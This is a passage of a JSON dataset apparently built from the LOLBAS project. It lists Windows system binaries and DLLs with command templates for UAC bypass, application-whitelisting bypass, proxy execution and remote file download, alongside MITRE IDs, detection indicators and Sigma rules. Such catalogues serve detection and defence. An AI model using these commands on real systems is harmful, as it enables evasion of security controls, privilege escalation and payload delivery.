--browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcad32-exe:0","toolId":"lolbas:odbcad32-exe","toolName":"odbcad32.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"odbcad32.exe","description":"Launch odbcad32.exe GUI, click 'Tracing' tab, click 'Browsing' button, enter abitrary command in the File Dialog's path, press enter.","usecase":"Execute a binary as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"odbcad32.exe spawning unexpected child processes."}],"references":["https://medium.com/@thebinaryhashira/living-off-the-land-and-living-above-uac-6a66738d225c","https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:setupugc-exe:0","toolId":"lolbas:setupugc-exe","toolName":"setupugc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setupugc.exe specialize","description":"By first setting a command to a specific registry under `Setup-Unattend-Settings`, e.g. via: `reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\1\" /v Path /d \"{CMD}\" /f`, executing the following will cause it to execute the command.\n","usecase":"Execute binary through legitimate proxy","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`setupugc.exe` spawning child processes outside of Windows Setup context. Legitimate parents are `setuphost.exe` or `setup.exe`."},{"type":"IOC","value":"Registry writes to `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\` on a deployed system."}],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:setupugc-exe:1","toolId":"lolbas:setupugc-exe","toolName":"setupugc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setupugc.exe auditUser","description":"Same technique as above, but using the `auditUser` command-line option.","usecase":"Execute binary through legitimate proxy","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`setupugc.exe` spawning child processes outside of Windows Setup context. Legitimate parents are `setuphost.exe` or `setup.exe`."},{"type":"IOC","value":"Registry writes to `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\` on a deployed system."}],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:write-exe:0","toolId":"lolbas:write-exe","toolName":"write.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"write.exe","description":"Executes a binary provided in default value of `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\wordpad.exe`.","usecase":"Execute binary through legitimate proxy. This might be utilized to confuse detection solutions that rely on parent-child relationships.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Changes to HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\wordpad.exe"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml"}],"references":["https://gist.github.com/mblzk/b8c5ff7c2bd0fb2b385cc2fdd119874b","https://lolbas-project.github.io/lolbas/Binaries/write/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wt-exe:0","toolId":"lolbas:wt-exe","toolName":"wt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wt.exe {CMD}","description":"Execute a command via Windows Terminal.","usecase":"Use wt.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"}],"references":["https://twitter.com/nas_bench/status/1552100271668469761","https://lolbas-project.github.io/lolbas/Binaries/wt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:advpack-dll:0","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:advpack-dll:1","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:advpack-dll:2","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}","description":"Launch a DLL payload by calling the RegisterOCX function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:advpack-dll:3","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}","description":"Launch an executable by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:advpack-dll:4","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 advpack.dll, RegisterOCX {CMD}","description":"Launch command line by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:desk-cpl:0","toolId":"lolbas:desk-cpl","toolName":"Desk.cpl","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}","description":"Launch an executable with a .scr extension by calling the InstallScreenSaver function.","usecase":"Launch any executable payload, as long as it uses the .scr extension.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:desk-cpl:1","toolId":"lolbas:desk-cpl","toolName":"Desk.cpl","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}","description":"Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.","usecase":"Launch any executable payload, as long as it uses the .scr extension.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dfshim-dll:0","toolId":"lolbas:dfshim-dll","toolName":"Dfshim.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieadvpack-dll:0","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieadvpack-dll:1","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieadvpack-dll:2","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}","description":"Launch a DLL payload by calling the RegisterOCX function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieadvpack-dll:3","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}","description":"Launch an executable by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieadvpack-dll:4","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 ieadvpack.dll, RegisterOCX {CMD}","description":"Launch command line by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieframe-dll:0","toolId":"lolbas:ieframe-dll","toolName":"Ieframe.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/ieframe_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshtml-dll:0","toolId":"lolbas:mshtml-dll","toolName":"Mshtml.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}","description":"Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box).","usecase":"Launch an HTA application.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/pabraeken/status/998567549670477824","https://windows10dll.nirsoft.net/mshtml_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcwutl-dll:0","toolId":"lolbas:pcwutl-dll","toolName":"Pcwutl.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}","description":"Launch executable by calling the LaunchApplication function.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"toolType":"Library","detection":[{"type":"Analysis","value":"https://redcanary.com/threat-detection-report/techniques/rundll32/"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/harr0ey/status/989617817849876488","https://windows10dll.nirsoft.net/pcwutl_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:photoviewer-dll:0","toolId":"lolbas:photoviewer-dll","toolName":"PhotoViewer.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe \"C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll\",ImageView_Fullscreen {REMOTEURL}","description":"Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"toolType":"Library","detection":[{"type":"IOC","value":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument"}],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scrobj-dll:0","toolId":"lolbas:scrobj-dll","toolName":"Scrobj.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe C:\\Windows\\System32\\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}","description":"Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"IOC","value":"Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line"}],"references":["https://twitter.com/eral4m/status/1479106975967240209","https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:setupapi-dll:0","toolId":"lolbas:setupapi-dll","toolName":"Setupapi.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file 